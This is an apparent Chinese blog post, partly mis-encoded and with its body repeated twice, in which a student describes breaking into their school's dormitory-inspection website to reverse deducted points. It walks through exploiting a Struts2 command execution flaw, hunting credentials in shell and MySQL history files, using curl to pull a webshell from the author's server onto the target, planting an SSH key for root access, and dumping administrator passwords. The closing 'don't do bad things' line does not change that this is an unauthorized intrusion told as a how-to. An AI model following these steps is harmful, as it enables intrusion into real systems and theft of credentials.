渗透学校某系统
起因:檢查宿舍的人扣我們寢室的的分了,學(xué)長(zhǎng)告訴我有漏洞的, 那就燃起斗志搞下他??? 233333
目標(biāo)網(wǎng)址:xxxxx.action
漏洞:struct2任意命令執(zhí)行
不要說存在任意命令執(zhí)行就感覺可以完成一切了,之前我也是這樣想的,實(shí)際情況告訴我,我想做的事情并做不了
利用過程:?? ?
首先是我已經(jīng)可以執(zhí)行命令了,但是我想獲取它mysql里邊存放的網(wǎng)站管理員的賬號(hào)密碼,因?yàn)槲乙奈业姆致?#xff0c;只是命令是沒有用的
首先需要找到mysql的賬號(hào)密碼,然后登陸進(jìn)去mysql
目標(biāo)清楚了,然后開始操作,找mysql的賬號(hào)密碼
我的第一反應(yīng)是直接在網(wǎng)站的配置文件中找mysql的賬號(hào)密碼,文件好多啊...
手工太麻煩了,就是著用grep -rn "root" 這樣的方法去減少我查找的范圍,雖然是少了一點(diǎn),但是
還是感覺好麻煩...關(guān)鍵是找了好久都是亂七八糟的信息,有點(diǎn)躁...
大約半個(gè)月前就想著利用過,在 /root/下邊發(fā)現(xiàn)好多 .bash_history .mysql_history 的記錄文件,
就一個(gè)一個(gè)打開看的沒有發(fā)現(xiàn)有管理員的賬號(hào)密碼,也沒有我想要的信息
所以這次測(cè)試的時(shí)候基本沒想過看這幾個(gè)文件,想著和之前的文件應(yīng)該是一樣的,事實(shí)證明這個(gè)想法是錯(cuò)的
依舊是這個(gè)文件,我沒有找到系統(tǒng)管理員的賬號(hào)密碼,然而,我發(fā)現(xiàn)了mysql管理員的賬號(hào)和密碼
連接數(shù)據(jù)庫,我知道兩種方法,
一種是大馬上邊自帶的數(shù)據(jù)庫連接,第二種就是ssh鏈接進(jìn)去,命令行連接
第一種方法:我的大馬需要有數(shù)據(jù)庫名稱,這就尷尬了,本來就不想去文件堆里邊找數(shù)據(jù)庫的信息了,直接放棄了...
第二種方法:因?yàn)椴荒苁褂胑cho 重定向等我知道的寫入文件的命令,然后我的服務(wù)器就派上用場(chǎng)了,對(duì),使用curl
這里邊的curl是可以用的,但是后綴記得改掉,因?yàn)橄螺d文件的時(shí)候.jsp/.php后綴文件,你只能下載下來html
curl xxxxxxxxx/dama.txt -o /xx/xx/dama.jsp 就ok了 ~~
大馬上去了就可以方便讀寫文件了,我試著直接在.ssh目錄下邊新建文件失敗,然后測(cè)試是否是大馬的上傳功能
不能使用,然后在/root/目錄下進(jìn)行新建文件,成功!接著想到了,能不能在/root/目錄下創(chuàng)建好公匙文件,
然后移動(dòng)到 .ssh 目錄? 將目標(biāo)服務(wù)器上邊的ssh的公匙復(fù)制下,然后將自己的公匙添加到人家的公匙下邊
我進(jìn)行嘗試 ,創(chuàng)建成功!移動(dòng)成功!
接著新手需要注意了,重啟sshd 服務(wù)才可以,大馬進(jìn)行命令執(zhí)行 service sshd restart
提示 ,重啟成功!
ssh root@xxx.xxx.xxx.xxx
連接成功!!!
之后嘗試進(jìn)行mysql的登錄
mysql -uroot -p
登陸成功!!!
查詢數(shù)據(jù)庫的信息,成功找到網(wǎng)站管理員的賬號(hào)密碼!!!
到此,滲透加上獲取自己需要的信息完畢
可以向同學(xué)裝逼了 23333
警告!!!不要做壞事哦!!!
目標(biāo)網(wǎng)址:xxxxx.action
漏洞:struct2任意命令執(zhí)行
不要說存在任意命令執(zhí)行就感覺可以完成一切了,之前我也是這樣想的,實(shí)際情況告訴我,我想做的事情并做不了
利用過程:?? ?
首先是我已經(jīng)可以執(zhí)行命令了,但是我想獲取它mysql里邊存放的網(wǎng)站管理員的賬號(hào)密碼,因?yàn)槲乙奈业姆致?#xff0c;只是命令是沒有用的
首先需要找到mysql的賬號(hào)密碼,然后登陸進(jìn)去mysql
目標(biāo)清楚了,然后開始操作,找mysql的賬號(hào)密碼
我的第一反應(yīng)是直接在網(wǎng)站的配置文件中找mysql的賬號(hào)密碼,文件好多啊...
手工太麻煩了,就是著用grep -rn "root" 這樣的方法去減少我查找的范圍,雖然是少了一點(diǎn),但是
還是感覺好麻煩...關(guān)鍵是找了好久都是亂七八糟的信息,有點(diǎn)躁...
大約半個(gè)月前就想著利用過,在 /root/下邊發(fā)現(xiàn)好多 .bash_history .mysql_history 的記錄文件,
就一個(gè)一個(gè)打開看的沒有發(fā)現(xiàn)有管理員的賬號(hào)密碼,也沒有我想要的信息
所以這次測(cè)試的時(shí)候基本沒想過看這幾個(gè)文件,想著和之前的文件應(yīng)該是一樣的,事實(shí)證明這個(gè)想法是錯(cuò)的
依舊是這個(gè)文件,我沒有找到系統(tǒng)管理員的賬號(hào)密碼,然而,我發(fā)現(xiàn)了mysql管理員的賬號(hào)和密碼
連接數(shù)據(jù)庫,我知道兩種方法,
一種是大馬上邊自帶的數(shù)據(jù)庫連接,第二種就是ssh鏈接進(jìn)去,命令行連接
第一種方法:我的大馬需要有數(shù)據(jù)庫名稱,這就尷尬了,本來就不想去文件堆里邊找數(shù)據(jù)庫的信息了,直接放棄了...
第二種方法:因?yàn)椴荒苁褂胑cho 重定向等我知道的寫入文件的命令,然后我的服務(wù)器就派上用場(chǎng)了,對(duì),使用curl
這里邊的curl是可以用的,但是后綴記得改掉,因?yàn)橄螺d文件的時(shí)候.jsp/.php后綴文件,你只能下載下來html
curl xxxxxxxxx/dama.txt -o /xx/xx/dama.jsp 就ok了 ~~
大馬上去了就可以方便讀寫文件了,我試著直接在.ssh目錄下邊新建文件失敗,然后測(cè)試是否是大馬的上傳功能
不能使用,然后在/root/目錄下進(jìn)行新建文件,成功!接著想到了,能不能在/root/目錄下創(chuàng)建好公匙文件,
然后移動(dòng)到 .ssh 目錄? 將目標(biāo)服務(wù)器上邊的ssh的公匙復(fù)制下,然后將自己的公匙添加到人家的公匙下邊
我進(jìn)行嘗試 ,創(chuàng)建成功!移動(dòng)成功!
接著新手需要注意了,重啟sshd 服務(wù)才可以,大馬進(jìn)行命令執(zhí)行 service sshd restart
提示 ,重啟成功!
ssh root@xxx.xxx.xxx.xxx
連接成功!!!
之后嘗試進(jìn)行mysql的登錄
mysql -uroot -p
登陸成功!!!
查詢數(shù)據(jù)庫的信息,成功找到網(wǎng)站管理員的賬號(hào)密碼!!!
到此,滲透加上獲取自己需要的信息完畢
可以向同學(xué)裝逼了 23333
警告!!!不要做壞事哦!!!
總結(jié)
- 上一篇: 捷联惯导系统学习6.2(序贯滤波 )
- 下一篇: [附源码]计算机毕业设计JAVA民宿客栈